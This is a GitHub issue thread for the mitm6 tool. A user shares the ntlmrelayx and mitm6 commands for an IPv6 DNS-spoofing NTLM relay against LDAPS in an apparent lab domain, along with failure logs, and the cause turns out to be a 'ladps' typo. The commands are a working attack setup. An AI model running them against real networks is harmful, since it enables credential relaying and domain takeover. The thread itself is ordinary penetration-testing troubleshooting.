dirkjanm / mitm6

pwning IPv4 via IPv6

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Protocol Client for LADPS not found! error

CustosClarus opened this issue · comments

I'm using
Name: mitm6
Version: 0.3.0

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Steps to reproduce

  • ntlmrelayx.py -6 -t ladps://192.168.0.100 -wh fakewpad.hacklab.local -l lootme
  • sudo mitm6 -d hacklab.local
] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.168.0.100 failed
[*] HTTPD(80): Connection from ::ffff:192.168.0.102 controlled, attacking target ladps://192.168.0.100
[-] Protocol Client for LADPS not found!
[-] HTTPD(80): Negotiating NTLM with ladps://192.1

I verified using RSAT tool /ldp.exe and connectivity is okay.

image

It should be ldaps not ladps, which is why it can't find the protocol

That's a very dumb error by me, Thank you for identifying.